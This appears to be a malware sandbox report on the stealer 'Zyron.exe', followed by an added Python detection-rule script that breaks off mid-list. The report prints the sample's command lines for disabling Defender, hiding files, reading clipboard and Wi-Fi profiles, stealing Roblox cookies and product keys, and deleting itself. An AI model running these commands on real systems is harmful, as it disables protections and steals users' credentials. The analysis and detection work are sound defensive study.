Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4996 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe \??\c:\users\admin\appdata\local\temp\zyron.exe 
PID 4996 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe \??\c:\users\admin\appdata\local\temp\zyron.exe 
PID 2584 wrote to memory of 3468 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  \??\c:\users\admin\appdata\local\temp\zyron.exe 
PID 2584 wrote to memory of 3468 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  \??\c:\users\admin\appdata\local\temp\zyron.exe 
PID 3468 wrote to memory of 2324 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 2324 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 4964 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 4964 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 4976 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 4976 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 5020 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 5020 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 4344 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 4344 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 5020 wrote to memory of 1760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 5020 wrote to memory of 1760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2324 wrote to memory of 340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 5064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 4976 wrote to memory of 5064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 4964 wrote to memory of 3368 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4964 wrote to memory of 3368 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4344 wrote to memory of 1876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4344 wrote to memory of 1876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3468 wrote to memory of 2124 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 2124 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 2124 wrote to memory of 3824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2124 wrote to memory of 3824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3468 wrote to memory of 1936 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 1936 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1936 wrote to memory of 2260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1936 wrote to memory of 2260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3468 wrote to memory of 4080 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3468 wrote to memory of 4080 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4080 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4080 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3468 wrote to memory of 3848 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 3848 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3848 wrote to memory of 1744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3848 wrote to memory of 1744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3468 wrote to memory of 3520 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 3520 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 2552 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 2552 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3520 wrote to memory of 1512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3520 wrote to memory of 1512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2552 wrote to memory of 1008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 1008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3468 wrote to memory of 2256 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 2256 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 1988 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 1988 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 2256 wrote to memory of 5080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2256 wrote to memory of 5080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1988 wrote to memory of 240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1988 wrote to memory of 240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3468 wrote to memory of 4412 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 4412 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 3232 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 3232 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 3952 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 3952 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 3112 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 3112 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Zyron.exe

"C:\Users\Admin\AppData\Local\Temp\Zyron.exe"

\??\c:\users\admin\appdata\local\temp\zyron.exe 

c:\users\admin\appdata\local\temp\zyron.exe 

\??\c:\users\admin\appdata\local\temp\zyron.exe 

c:\users\admin\appdata\local\temp\zyron.exe 

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe ""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ ‏  .scr'"

C:\Windows\system32\attrib.exe

attrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ ‏  .scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wywphiwm\wywphiwm.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6AFE.tmp" "c:\Users\Admin\AppData\Local\Temp\wywphiwm\CSC923901C5E42B49448D1793F52EDD9E9.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI25842\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\9ZHOu.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI25842\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI25842\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\9ZHOu.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\Resources\Themes\icsys.icn.exe

C:\Windows\Resources\Themes\icsys.icn.exe

\??\c:\windows\resources\themes\explorer.exe

c:\windows\resources\themes\explorer.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

\??\c:\windows\resources\svchost.exe

c:\windows\resources\svchost.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe PR

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "c:\users\admin\appdata\local\temp\zyron.exe ""

C:\Windows\system32\PING.EXE

ping localhost -n 3
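
Detection logic for the process list above, added here as an example and not part of the sandbox output. It runs the report's own command lines, rebuilt as Sysmon Event ID 1 / Windows 4688-style records (the ProcEvent fields, the rule names and the pairing of PIDs with specific command lines are assumptions), through a small rule set covering what the tree shows: Defender exclusions added and engine switches turned off, definitions removed with MpCmdRun, the dropped binary hidden with attrib +h +s, the hosts file unlocked, the Startup-folder .scr whose file name is built from zero-width and bidi characters so it renders blank in Explorer, the password-protected rar archive of the loot, the ping-then-del self-deletion, and a lineage check for cmd/powershell launched by an executable under %TEMP%. The mshta popup text is French, roughly "I will not be responsible for what you do with this tool", titled "Message from Tookie"; the same handle is the rar password ("Tookie57!").

```python
"""Flag the host-tampering command lines from this report in process-creation
telemetry (Sysmon Event ID 1 / Windows 4688 shaped records: pid, parent pid,
image, command line). Added example, not part of the sandbox output. The
ProcEvent shape, the rule names and the pairing of PIDs with command lines
are assumptions; the command lines themselves come from the report."""
import re
import unicodedata
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# (rule name, ATT&CK technique, pattern over the command line)
RULES = [
    ("defender_exclusion_added", "T1562.001", re.compile(r"add-mppreference\b.*-exclusionpath", re.I)),
    ("defender_engine_disabled", "T1562.001", re.compile(
        r"set-mppreference\b.*-disable(realtimemonitoring|ioavprotection|scriptscanning|intrusionpreventionsystem)\s+\$true", re.I)),
    ("defender_definitions_removed", "T1562.001", re.compile(r"mpcmdrun\.exe.*-removedefinitions", re.I)),
    ("hidden_system_attributes_set", "T1564.001", re.compile(r"\battrib\b(?=.*\+h\b)(?=.*\+s\b)", re.I)),
    ("hosts_file_unlocked", "T1562.001", re.compile(r"\battrib\b.*\s-r\b.*drivers\\etc\\hosts", re.I)),
    ("ping_delay_then_self_delete", "T1070.004", re.compile(r"\bping\b.*-n\s+\d+.*&&\s*del\b", re.I)),
    ("password_protected_archive", "T1560.001", re.compile(r"\brar\.exe\b.*\s-hp", re.I)),
    ("clipboard_read", "T1115", re.compile(r"\bget-clipboard\b", re.I)),
    ("wifi_profiles_enumerated", "T1016", re.compile(r"\bnetsh\s+wlan\s+show\s+profile", re.I)),
    ("av_products_enumerated", "T1518.001", re.compile(r"securitycenter2.*antivirusproduct", re.I)),
    ("roblox_cookie_read", "T1552.002", re.compile(r"\.roblosecurity\b", re.I)),
]
TECHNIQUE = {name: tid for name, tid, _ in RULES}
TECHNIQUE["startup_entry_with_invisible_name"] = "T1547.001"
TECHNIQUE["shell_spawned_from_temp_executable"] = "T1059"
STARTUP_RE = re.compile(r"start menu\\programs\\startup\\([^\\'\"]+)", re.I)
TEMP_DIR_RE = re.compile(r"\\appdata\\local\\temp\\", re.I)


def startup_entry_has_invisible_name(cmdline):
    """True for a Startup-folder file whose name (minus extension) is only spaces
    and Unicode format characters (zero-width joiner, bidi marks): Explorer shows
    it as a blank entry, which is how the report's '.scr' persistence hides."""
    m = STARTUP_RE.search(cmdline)
    if not m:
        return False
    stem = m.group(1).rsplit(".", 1)[0]
    return bool(stem) and all(unicodedata.category(c) in ("Zs", "Cf") for c in stem)


def match_event(ev, by_pid):
    hits = [name for name, _tid, rx in RULES if rx.search(ev.cmdline)]
    if startup_entry_has_invisible_name(ev.cmdline):
        hits.append("startup_entry_with_invisible_name")
    parent = by_pid.get(ev.ppid)  # lineage check: a shell launched by a %TEMP% binary
    if parent and TEMP_DIR_RE.search(parent.image) and ev.image.lower().endswith(("cmd.exe", "powershell.exe")):
        hits.append("shell_spawned_from_temp_executable")
    return hits


def scan(events):
    """Map pid -> matched rule names, keeping only events that matched."""
    by_pid = {e.pid: e for e in events}
    found = {e.pid: match_event(e, by_pid) for e in events}
    return {pid: hits for pid, hits in found.items() if hits}


def techniques_for(hits):
    return sorted({TECHNIQUE[h] for h in hits})


# Constructed sample built from the report's command lines; PIDs 3468/3520/2552/1008 are
# in the report's injection list, the other child PIDs are assigned here (assumption).
TEMP = r"C:\Users\Admin\AppData\Local\Temp"
ZYRON = TEMP + r"\zyron.exe "  # trailing space is part of the dropped path, as in the report
CMD = r"C:\Windows\system32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXCLUDE = "powershell -Command Add-MpPreference -ExclusionPath '%s'"
DISABLE = (r'powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true '
           r'-DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled '
           r'-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && '
           r'powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All')
# file name assumed to be: zero-width joiner, space, right-to-left mark, two spaces
INVISIBLE_SCR = r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" + "\\\u200d \u200f  .scr"


def via_cmd(inner):  # every child in the report is launched as cmd.exe /c "<inner>"
    return CMD + ' /c "' + inner + '"'


SAMPLE_EVENTS = [
    ProcEvent(3468, 2000, ZYRON, '"' + TEMP + r'\Zyron.exe"'),
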